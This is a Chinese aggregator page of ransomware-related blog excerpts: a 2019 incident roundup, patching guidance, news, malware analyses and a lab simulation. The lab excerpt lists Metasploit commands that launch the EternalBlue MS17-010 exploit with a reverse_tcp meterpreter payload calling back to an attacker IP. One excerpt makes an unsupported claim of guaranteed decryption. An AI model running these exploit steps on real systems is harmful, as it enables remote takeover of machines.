勒索

2019年勒索病毒事件大盘点

扶醉桌前 提交于 2020-03-20 01:58:17
勒索病毒是什么? 勒索病毒,是一种新型电脑病毒,主要以邮件、程序***、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。 ***的样本以exe、js、wsf、vbe等类型为主,勒索病毒文件进入本地后,就会自动运行,同时删除勒索软件样本,以躲避查杀和分析。接下来,勒索病毒会利用本地的互联网访问权限连接至勒索者的C&C服务器,进而上传本机信息并下载加密私钥与公钥,文件会被以AES+RSA4096位的算法加密。除了病毒开发者本人,其他人是几乎不可能解密的。 加密完成后,还会修改壁纸,在桌面等明显位置生成勒索提示文件,指导用户去缴纳赎金,即必须支付勒索资金,才能拿到解密的私钥,或者选择丢失文件。勒索病毒变种类型非常快,对常规的杀毒软件都具有免疫性。 据公开资料显示,全球最早的勒索病毒雏形诞生于1989年,由Joseph Popp编写,该***程序以“艾滋病信息引导盘”的形式进入系统。 中国大陆第一个勒索软件——Redplus勒索***(Trojan/Win32.Pluder)出现在2006年,该***会隐藏用户文档和包裹文件,然后弹出窗口要求用户将赎金汇入指定银行账号。 2019年勒索病毒事件 2019年应该是勒索病毒针对企业***爆发的一年,这一年全球各地仿佛都在被“勒索”,每天全球各地都有不同的政府、企业、组织机构被勒索病毒***的新闻被曝光

勒索病毒场景模拟及原理

允我心安 提交于 2020-02-17 07:23:32
一、 环境准备 需准备如下环境及工具: 1) 一台攻击虚机(Kali linux),一台靶机(Win7 64位) 3) 永恒之蓝(wannacry)病毒文件 二、 环境准备 1.在kali linux下启动 msfconsole 通过该应用,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等。 root@kali:~#msfconsole 2.利用永恒之蓝MS17-010漏洞 msf > use exploit/windows/smb/ms17_010_eternalblue 3. 设定靶机 IP 和操作机 IP 172.22.170.4为操作机kali-linux ip地址 172.22.171.4为靶机windows 7 ip地址 msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 172.22.171.4 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 172.22.170.4 4.设置TCP连接 使用meterpreter编写的TCP反弹连接木马,用于在渗透成功后向攻击机发起连接请求进一步控制靶机的模块。 set payload windows/x64/meterpreter/reverse_tcp 5

window安装特定补丁(勒索病毒)

早过忘川 提交于 2020-02-10 20:17:44
最近出现震惊的蠕虫病毒(勒索病毒),微软也做出相应的安全补丁来修复 MS17-010。这时有些同学不想打开电脑 的自动更新,这样会下载大量补丁,要更新完这些补丁要好几个小时,为了不影响正常工作,我们就更新 上面指定的补丁 下面我要讲的方法,也适合其它指定要修复的补丁操作,这次以 MS17-010 补丁为例,演示如下安装: 第一步: 打开微软的技术中心 https://technet.microsoft.com/zh-cn/ 搜索 MS17-010 第二步: 找到自己电脑对应的补丁,注意,微软只提供win7以后版本的补丁,xp就不要在这里找了 查看自己电脑操作系统,右击桌面上的“计算机” 选择 “属性” 可以看到我是win7的64位操作系统,接着我们在安全补丁页往下找(若32位的就找对应32位的补丁,不要弄乱了) 找到对应,就单击进去(我们为了快一点,只要选择仅用于安全更新就可以) 第三步: 进入具体补丁号的页面,找到单独下载补丁的超链接 单击后进入下载页面: 第四步: 单击下载到本地 可以看到编号是4012212 ,对应 x64, 是64位操作系统, 第五步: 安装,只要双击它就可以,然后点 下一步,就可以 我的电脑已经安装这个补丁,就提示我不要再装了,若大家的电脑没有装了就会开始安装,安装时要等几分钟 不会很长时间的,安装完成,它会提醒我们重启电脑应用这个补丁

2019年网络安全威胁统计

我怕爱的太早我们不能终老 提交于 2019-12-30 23:26:54
导读 这些年网络的发展的确给我们带来了很多便利,但是同样也给***们带来更多的可能。今天小聪就给大家分享一下让我们极其厌烦的几种网络安全威胁。 说到网络威胁可能很多人都会深恶痛绝,因为实在是备受困扰。小到个人的信息泄露,大到企业、国家的财务损失以及机密信息外漏。最近看到Webroot发布了一个年度恶意软件列表,向我们展示了2019年最臭名昭著的网络安全威胁!从***次数最多的勒索软件和加密挖矿,到破坏最大的网络钓鱼***,让我们的全球网络威胁正在变得更为先进且难以预测。 2019年网络安全威胁统计2019年网络安全威胁统计 这些年网络的发展的确给我们带来了很多便利,但是同样也给***们带来更多的可能。今天小聪就给大家分享一下让我们极其厌烦的几种网络安全威胁: 第一、勒索软件 勒索软件是在前几年针对性***的模式下开始慢慢成熟的。中小型企业由于在安全预算和技能方面的限制,仍然是勒索软件的主要目标。不管是针对员工的网络钓鱼***还是利用不安全的RDP进行强行勒索,勒索软件都像以往一样有效。包括: Emotet-Trickbot-Ryuk(“三合一威胁”):就经济损失而言,这是2019年最成功的组合一。他们把重点更多地转移到了侦察行动上。感染目标网络后分配一个值,然后在横向移动和部署勒索软件后发送该金额的赎金。 Trickbot / Ryuk

美新奥尔良市遭遇勒索软件***:市长宣布进入紧急状态

蓝咒 提交于 2019-12-16 22:52:33
  12 月 15 日,据外媒报道,<strong>美国新奥尔良市遭到大规模勒索软件***,市长 LaToya Cantrell 宣布全市进入紧急状态。</strong>   国土安全和应急准备办公室补充了许多细节,本次袭击从当地时间 12 月 13 日凌晨 5 点开始,随后官方在在纽约市的网络上检测到可疑活动,并于当日上午 11 点检测到了安全事件,为了预防***,<strong>该市 IT 部门已经下达命令,要求所有员工关闭计算机并断开 Wi-Fi 链接,关闭城市服务器电源,并强调要拔掉所有设备的电源。</strong>   不过公共摄像头、警察与消防部门、911 报警电话都还在正常运作。市长表示,目前没有收到***的勒索要求,也没有员工被诱骗交出登录详细信息。   此前在 10 月 2 日,FBI 曾发布网络***预警,提醒州政府和地方政府应对网络***,FBI 警告说,不仅仅是政府部门,医疗部门、工业公司和运输业也会受到***。   而且新奥尔良并非唯一受到勒索软件***美国官方机构,此前路易斯安州、得克萨斯州也都曾遭遇网络***,8 月份一次网络***曾使得克萨斯州 23 个政府机构脱机。 来源: 51CTO 作者: es1xune 链接: https://blog.51cto.com/13390677/2459113

Ransomware勒索病毒分析报告

烂漫一生 提交于 2019-12-04 08:13:25
Ransomware勒索病毒 分析报告 样本名 Ransomware.exe 班级 34 期 作者 梅源 时间 2019 年10月25日 平台 VM Windows 7 32 位 15PB信息安全研究院(协议分析报告) 1 . 样本概况 1.1 应用程序信息 应用程序名称 :Radamant勒索病毒 大小 : 85824 bytes 修改时间 : 2019-10-26 12:06:22 MD5 值 : 9b7b16867eeab851d551bfa014166e1a SHA1 值 : be080d99a299a8708461efce76b524b82142fb28 简单功能介绍:安装自身到C:\User\15pb-win7\AppData\Roaming目录下并重命名为DirectX.exe并将文件属性设置为隐藏后执行,删除自身 ,修改注册表自启动,checkip.dyndns.org发送get请求,接收来自服务器的指令,并执行(病毒更新,发送宿主机信息,加密电脑文件,解密电脑文件) 1.2 分析环境及工具 系统环境:VM Windows 7 32位 工具: PC-Hunter,OD,IDAPro,PEID,Hash,火绒剑 1.3 分析目标 能进行更新病毒,远程操控宿主机,并加密文件 2 .具体分析过程 2.1 提取样本 • 使用ARK(PC-Hunter)工具查看可以进程 •

勒索病毒[recoverydata54@cock.li]。harma,这样恢复文件。

醉酒当歌 提交于 2019-12-04 03:18:16
还没有从搬新家的喜悦中恢复回来,突然有一天发现,自己的1T的硬盘的历史遗迹里面的文件都不能打开了。尤其是孩子们的珍贵照片。 这可让我着急了好几天。过了几天我才知道,原来是有天晚上,4周岁的儿子自己不知道怎么点了什么,电脑中毒了。 没办法的情况下,先重装了Win10。解决了系统不能登陆的问题。然后,在本周末,花了一个上午的时间,终于用disk genius找回来被加密的文件。 我把截图放在这里。 大致总结一下,这个病毒最近流行很猛,就是勒索病毒。他的本质就是,拿到你机器的管理权,然后给你的文件进行加密,之后把源文件删除了,只保留了加密后的文件。并且会留下一个联系方式。比如我这个是: all your data has been locked us You want to return? Write email recoverydata54@cock.li or recoverydata52@cock.li 虽然运行时间比较长,但是重要文件是可以找回来的。 我的硬盘是HHD,估计SSD应该也可以找回。祝福大家好运。希望以后不要再中毒。 来源: https://www.cnblogs.com/simontaylor/p/11828825.html

【逆向实战】恶意勒索软件分析,揪出病毒作者_披着羊皮的狼_被注入恶意代码的apk

匿名 (未验证) 提交于 2019-12-02 23:43:01
/ 文章作者:Kali_MG1937 QQ:3496925334 CSDN博客号:ALDYS4 / 今天逛某论坛的时候发现了一篇求助贴 有意思,好久没分析过恶意软件了 今天就拿它来练练手 反编译工具 apktool jd-gui eclipse(CFR,JD-CORE等反编译引擎) JADX DEX2JAR 0x01>分析AndroidManifest.xml 先看看恶意软件的基本信息 先百度一下恶意软件的包名 搜索结果显示这是一个被各大应用市场收录的软件 那么我分析我手上的这个恶意软件应该是被注入了恶意代码 如果我是恶意软件的开发者, 一定会在第一时间让受害者触发恶意代码 那么先查看软件的主入口 com.superthomaslab.rootessentials.main_screen.MainActivity 看来这就是软件主入口了 0x02>分析代码 跟进主入口 可以看到截屏中的第6行 程序引入了一个包(Unlock.Unlock),而且我与未被注入代码的软件对照 原软件并没有引入此包 果断搜索Unlock 程序在重写onCreateOptionsMenu方法时调用了Unlock中的方法 并向方法内传入了一个Context 跟进Unlock 查看Unlock方法 在第一句就申请了root权限,emm 不管,先看下去 第12行,变量名为file2的File获取了软件本身的资源

中了后缀adobe勒索病毒怎么办 恢复方法百分百解密成功[veracrypt@foxmail.com

匿名 (未验证) 提交于 2019-12-02 23:36:01
深圳的一个公司中了后缀是adobe的勒索病毒,全部文件后缀变成了[veracrypt@foxmail.com].adobe 公司内中了20几台电脑,中毒后,公司领导特别着急,通过深圳的朋友找到我们,经过我们共同的研究与合作,成功恢复所有被加密文件 勒索病毒如何预防 : 1、及时给电脑打补丁,修复漏洞。 2、对重要的数据文件定期进行非本地备份。 3、不要点击来源不明的邮件附件,不从不明网站下载软件。 4、尽量关闭不必要的文件共享权限。 5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。 6、GandCrab勒索软件会利用RDP(远程桌面协议),如果业务上无需使用RDP的,建议关闭RDP 7、找可靠的恢复数据公司解密

SQLServer数据库mdf文件中了勒索病毒.Artemis 865,扩展名变为mdf.Artem

烈酒焚心 提交于 2019-11-30 00:32:36
SQLServer数据库mdf文件中了勒索病毒.Artemis 865,扩展名变为mdf.Artemis 865 “十二主神”1.0版本的常见的扩展名如下: *.mdf.Zeus666 *.ldf.Zeus666 *.mdf.Poseidon666 *.ldf.Poseidon666 *.mdf.Apollo666 *.ldf.Apollo666 *.mdf.Artemis666 *.ldf.Artemis666 *.mdf.Ares666 *.ldf.Ares666 *.mdf.Aphrodite666 *.ldf.Aphrodite666 *.mdf.Dionysus666 *.ldf.Dionysus666 *.mdf.Persephone666 *.ldf.Persephone666 *.mdf.Hephaestus666 *.ldf.Hephaestus666 *.mdf.Hades666 *.ldf.Hades666 *.mdf.Demeter666 *.ldf.Demeter666 *.mdf.Hera666 *.ldf.Hera666 “十二主神”2.0版本的常见的扩展名如下: *.mdf.Zeus865 *.ldf.Zeus865 *.mdf.Poseidon865 *.ldf.Poseidon865 *.mdf.Apollo865 *.ldf.Apollo865